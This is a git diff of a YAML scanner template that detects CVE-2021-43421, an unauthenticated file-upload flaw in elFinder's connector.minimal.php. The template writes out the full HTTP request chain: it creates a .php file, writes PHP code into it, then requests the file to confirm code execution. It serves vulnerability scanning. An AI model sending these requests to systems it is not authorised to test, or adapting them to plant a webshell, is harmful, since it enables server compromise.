diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml index 9d69233ed8..d996c5ac96 100644 --- a/cves/2021/CVE-2021-43421.yaml +++ b/cves/2021/CVE-2021-43421.yaml @@ -1,49 +1,50 @@ id: CVE-2021-43421 info: - name: Studio-42 elFinder RCE <2.1.60 + name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload author: akincibor severity: critical - description: A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code. + description: | + A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code. reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 - tags: cve,cve2021,rce,unauth,elfinder + tags: cve,cve2021,elfinder,unauth,upload,rce requests: - raw: - | - GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa HTTP/1.1 + GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1 Host: {{Hostname}} Accept: */* - | - POST /2/elFinder/php/connector.minimal.php HTTP/1.1 + GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, /; q=0.01 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e - | - GET /2/elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1 + GET /elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1 Host: {{Hostname}} Accept: */* - extractors: - - type: regex - name: hash - internal: true - group: 1 - regex: - - '"hash"\:"(.*?)"\,' - + - | + GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1 + Host: {{Hostname}} + Accept: */* req-condition: true matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr_1}}")' - - "status_code_3 == 200" + - 'contains(body_3, "{{randstr}}")' + - 'contains(body_4, "{{randstr_1}}")' + - "status_code == 200" condition: and + + extractors: + - type: regex + name: hash + group: 1 + regex: + - '"hash"\:"(.*?)"\,' + internal: true